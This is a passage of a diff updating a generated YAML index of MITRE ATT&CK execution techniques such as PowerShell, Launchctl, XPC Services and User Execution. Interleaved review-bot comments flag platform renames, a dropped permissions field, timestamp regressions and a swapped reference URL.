Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
- These scripts may also be compiled into self-contained exectuable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
+ These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
@@ -25096,7 +25410,7 @@ execution:
- Liran Ravich, CardinalOps
- Serhii Melnyk, Trustwave SpiderLabs
- Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
- - Monty
+ - "@_montysecurity"
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -25133,11 +25447,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:44:20.143Z'
name: Cloud API
description: "Adversaries may abuse cloud APIs to execute malicious commands.
APIs available in cloud environments provide various functionalities and are
@@ -25174,11 +25487,10 @@ execution:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
x_mitre_remote_support: false
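Review bot: the T1059.009 platform list replaces `Azure AD`, `Office 365` and `Google Workspace` with `Office Suite` and `Identity Provider` (with `IaaS` and `SaaS` unchanged). Any consumer that selects techniques by the old platform strings will silently lose this technique after the change, so the per-platform index outputs need to be regenerated together with this file and checked for categories that are now empty or renamed. The 1.0 to 1.1 version bump matches the platform change, and the same rename is applied to the parent T1059 further down, so the two objects are at least consistent with each other.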
@@ -25197,13 +25509,12 @@ execution:
url: https://github.com/Azure/azure-powershell
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1610:
technique:
- modified: '2024-04-11T21:24:42.680Z'
+ modified: '2024-10-15T15:06:17.124Z'
name: Deploy a container
description: |-
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -25282,12 +25593,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1610
atomic_tests: []
T1059:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Command and Scripting Interpreter
description: |-
Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
@@ -25298,6 +25608,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: |-
Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
@@ -25308,16 +25619,16 @@ execution:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- - Office 365
- - Azure AD
- IaaS
- - Google Workspace
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Script: Script Execution'
- 'Process: Process Creation'
@@ -25348,14 +25659,11 @@ execution:
url: https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059
atomic_tests: []
T1609:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:25:45.507Z'
name: Kubernetes Exec Into Container
description: |-
Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
@@ -25421,39 +25729,13 @@ execution:
url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1609
atomic_tests: []
T1569.001:
technique:
- x_mitre_platforms:
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
- type: attack-pattern
- created: '2020-03-10T18:26:56.187Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1569.001
- url: https://attack.mitre.org/techniques/T1569/001
- - source_name: Launchctl Man
- url: https://ss64.com/osx/launchctl.html
- description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
- - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
- description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
- Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
- source_name: Sofacy Komplex Trojan
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-20T20:14:35.179Z'
name: 'System Services: Launchctl'
description: |
Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
@@ -25462,6 +25744,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: "Every Launch Agent and Launch Daemon must have a corresponding
plist file on disk which can be monitored. Monitor for recently modified or
created plist files with a significant change to the executable path executed
@@ -25474,19 +25757,42 @@ execution:
are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s
or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure
the services are unloaded prior to deleting plist files."
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
- 'Service: Service Creation'
- 'File: File Modification'
- x_mitre_permissions_required:
- - User
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
+ created: '2020-03-10T18:26:56.187Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1569/001
+ external_id: T1569.001
+ - source_name: Sofacy Komplex Trojan
+ description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
+ Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
+ url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ - source_name: Launchctl Man
+ description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
+ url: https://ss64.com/osx/launchctl.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1569.001
atomic_tests: []
T1059.008:
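Review bot: the T1569.001 rewrite drops `x_mitre_permissions_required` (`User`, `root`) without replacement, which is a content change rather than the key reordering the rest of the block performs (everything else that is removed, `id`, `created`, `created_by_ref`, `external_references`, `object_marking_refs`, reappears lower in the hunk, plus the new `revoked: false` and `x_mitre_remote_support: false`). T1053.003 keeps its `x_mitre_permissions_required: User` in this same patch, so either confirm that upstream removed the field for Launchctl specifically, or keep it here for consistency. The 1.1 to 1.2 version bump is consistent with a substantive change.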
@@ -25529,7 +25835,7 @@ execution:
data, modify startup configuration parameters to load malicious system software,
or to disable security features or logging to avoid detection.(Citation: Cisco
Synful Knock Evolution)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T20:28:09.848Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Network Device CLI
x_mitre_detection: |-
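Review bot: second timestamp regression in this patch: T1059.008 `modified` goes from `2022-05-11T14:00:00.188Z` back to `2022-04-19T20:28:09.848Z`, and the following hunk shows the object still at `x_mitre_attack_spec_version: 2.1.0` while its `spec_version` line is removed. Same question as for T1559.001: confirm this is the current upstream object and not a stale cached bundle before merging.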
@@ -25545,72 +25851,75 @@ execution:
x_mitre_remote_support: true
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1559.003:
technique:
- x_mitre_platforms:
- - macOS
+ modified: '2024-10-16T16:14:12.793Z'
+ name: XPC Services
+ description: |-
+ Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API
or the high level NSXPCConnection API
in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
+
+ Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_contributors:
+ - Csaba Fitzl @theevilbit of Kandji
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_contributors:
- - Csaba Fitzl @theevilbit of Offensive Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Access'
+ x_mitre_remote_support: false
type: attack-pattern
id: attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19
created: '2021-10-12T06:45:36.763Z'
- x_mitre_version: '1.0'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1559.003
url: https://attack.mitre.org/techniques/T1559/003
+ external_id: T1559.003
- source_name: creatingXPCservices
- url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
description: Apple. (2016, September 9). Creating XPC Services. Retrieved
April 19, 2022.
+ url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
- source_name: Designing Daemons Apple Dev
- url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
description: Apple. (n.d.). Retrieved October 12, 2021.
+ url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
- source_name: CVMServer Vuln
- url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
description: 'Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability
in macOS and iOS. Retrieved October 12, 2021.'
+ url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
- source_name: Learn XPC Exploitation
- url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
description: Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved
October 12, 2021.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API
or the high level NSXPCConnection API
in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
-
- Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: XPC Services
- x_mitre_detection: ''
- kill_chain_phases:
- - phase_name: execution
- kill_chain_name: mitre-attack
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Process: Process Access'
- x_mitre_remote_support: false
- x_mitre_attack_spec_version: 2.1.0
+ url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1204:
technique:
- modified: '2024-04-12T03:46:49.507Z'
+ modified: '2024-11-11T18:52:12.103Z'
name: User Execution
description: |-
An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
- Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+ Adversaries may also deceive users into performing actions such as:
+
+ * Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
+ * Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+ * Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
+ * Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
kill_chain_phases:
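Review bot: the new T1204 description list (`* Enabling ...` through `* Coerceing users ...`) carries the typo `Coerceing` (should be `Coercing`), and in the hunk as shown the list runs straight into the `For example, tech support scams ...` paragraph with no blank line, which a markdown renderer will fold into the last list item; if a blank context line was merely dropped from the diff display, only the typo remains. Both come from the upstream description text, so the fix belongs upstream or in a post-processing step rather than in hand edits to generated YAML. Two other things in this hunk to confirm: T1059.008 keeps `x_mitre_attack_spec_version: 2.1.0` after losing `spec_version`, and the T1559.003 contributor affiliation changes from `Offensive Security` to `Kandji` with the version left at 1.0, which is fine if upstream treats contributor edits as non-versioned.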
@@ -25618,7 +25927,11 @@ execution:
phase_name: execution
x_mitre_contributors:
- Oleg Skulkin, Group-IB
- - Goldstein Menachem
+ - Menachem Goldstein
+ - Harikrishnan Muthu, Cyble
+ - ReliaQuest
+ - Ale Houspanossian
+ - Fernando Bacchin
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
@@ -25633,7 +25946,7 @@ execution:
- macOS
- IaaS
- Containers
- x_mitre_version: '1.6'
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Instance: Instance Start'
- 'File: File Creation'
@@ -25660,6 +25973,10 @@ execution:
description: Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious
Bookmarks. Retrieved January 2, 2024.
url: https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/
+ - source_name: Reliaquest-execution
+ description: Reliaquest. (2024, May 31). New Execution Technique in ClearFake
+ Campaign. Retrieved August 2, 2024.
+ url: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
- source_name: Telephone Attack Delivery
description: 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November
4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery.
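Review bot: the new `Reliaquest-execution` source spells the author `Reliaquest.` while the contributor entry added earlier in this patch reads `ReliaQuest`, so the two spellings will sit side by side on the rendered technique page. Minor, and only worth changing if upstream does, since this file is regenerated from the STIX bundle.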
@@ -25670,15 +25987,19 @@ execution:
API forms and more to scam users in popular online game “Roblox”. Retrieved
January 2, 2024.
url: https://blog.talosintelligence.com/roblox-scam-overview/
+ - source_name: proofpoint-selfpwn
+ description: 'Tommy Madjar, Dusty Miller, Selena Larson. (2024, June 17).
+ From Clipboard to Compromise: A PowerShell Self-Pwn. Retrieved August 2,
+ 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1072:
technique:
- modified: '2024-04-12T03:40:37.954Z'
+ modified: '2024-09-25T20:49:37.227Z'
name: Software Deployment Tools
description: "Adversaries may gain access to and use centralized software suites
installed within an enterprise to execute commands and move laterally through
@@ -25695,7 +26016,7 @@ execution:
on cloud-hosted instances, as well as the execution of arbitrary commands
on on-premises endpoints. For example, Microsoft Configuration Manager allows
Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
- joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+ joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -25743,7 +26064,7 @@ execution:
- Windows
- Network
- SaaS
- x_mitre_version: '3.0'
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Application Log: Application Log Content'
@@ -25776,12 +26097,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1072
atomic_tests: []
T1059.001:
technique:
- modified: '2024-03-01T18:01:37.575Z'
+ modified: '2024-10-15T16:39:13.228Z'
name: 'Command and Scripting Interpreter: PowerShell'
description: |-
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process
cmdlet which can be used to run an executable and the Invoke-Command
cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
@@ -25842,8 +26162,9 @@ execution:
POWERSHELL LOGGING. Retrieved February 16, 2016.
url: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
- source_name: Github PSAttack
- description: Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
- url: https://github.com/jaredhaight/PSAttack
+ description: Haight, J. (2016, April 21). PS>Attack. Retrieved September 27,
+ 2024.
+ url: https://github.com/Exploit-install/PSAttack-1
- source_name: inv_ps_attacks
description: Hastings, M. (2014, July 16). Investigating PowerShell Attacks.
Retrieved December 1, 2021.
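Review bot: the 'Github PSAttack' reference URL now points at `https://github.com/Exploit-install/PSAttack-1`, a repository under a different owner than the author credited in the description (Haight, J.), where the old URL was the author's own repo. If the original repository is gone, a web.archive.org snapshot of it (as this diff already does for the Cyphort EvilBunny reference) preserves provenance better than a third-party re-upload whose contents nobody in this PR has verified.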
@@ -25865,12 +26186,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.001
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -25948,14 +26268,13 @@ execution:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1059.004:
technique:
- modified: '2024-04-16T12:24:40.163Z'
+ modified: '2024-10-15T15:17:19.136Z'
name: 'Command and Scripting Interpreter: Bash'
description: |-
Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
@@ -26013,36 +26332,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.004
atomic_tests: []
T1559:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
- type: attack-pattern
- created: '2020-02-12T14:08:48.689Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1559
- url: https://attack.mitre.org/techniques/T1559
- - source_name: Linux IPC
- url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
- description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
- March 11, 2022.
- - source_name: Fireeye Hunting COM June 2019
- url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
- description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
- 10, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-10T19:06:35.666Z'
name: Inter-Process Communication
description: "Adversaries may abuse inter-process communication (IPC) mechanisms
for local code or command execution. IPC is typically used by processes to
@@ -26063,25 +26357,110 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
or spawned processes that are associated with abuse of IPC mechanisms.
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- 'Script: Script Execution'
- 'Process: Process Access'
- x_mitre_permissions_required:
- - Administrator
- - User
- - SYSTEM
x_mitre_remote_support: true
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+ created: '2020-02-12T14:08:48.689Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1559
+ external_id: T1559
+ - source_name: Fireeye Hunting COM June 2019
+ description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
+ 10, 2019.
+ url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
+ - source_name: Linux IPC
+ description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
+ March 11, 2022.
+ url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1559
atomic_tests: []
+ T1059.011:
+ technique:
+ modified: '2024-10-01T15:19:54.163Z'
+ name: Lua
+ description: |-
